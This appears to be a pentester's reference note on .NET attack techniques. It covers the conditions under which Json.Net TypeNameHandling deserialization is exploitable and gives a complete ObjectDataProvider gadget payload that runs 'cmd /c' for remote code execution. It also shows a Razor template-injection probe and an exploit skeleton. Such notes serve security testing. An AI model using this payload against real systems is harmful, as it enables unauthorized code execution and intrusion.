xct's notes
Search…
.NET

Json.Net Deserialization

Requires a custom TypeNameHandling setting by the dev (not insecure by default!). On of the following must be true for type that is deserialized:
  • It is Object Type (java.lang.Object or System.Object)
  • It is a non-generic collection (e.g.: ArrayList, Hashtable, etc.)
  • It implements IDynamicMetaObjectProvider
  • It is System.Data.EntityKeyMember or any derived Type from it. We may not need even
    TypeNameHandling property set to a non-None (see the EntityKeyMemberConverter in
    "TypeConverters" ).
Common RCE payload (can also be created with ysoerial.net):
1
{
2
'$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
3
'MethodName':'Start',
4
'MethodParameters':{
5
'$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
6
'$values':['cmd','/c <payload>']
7
},
8
'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
9
}
Copied!

ASP.NET Razor Template Injection (SSTI)

Check if vulnerable:
1
@(7*7)
Copied!
Exploit:
1
@{
2
// C# code
3
}
Copied!

References

Last modified 21d ago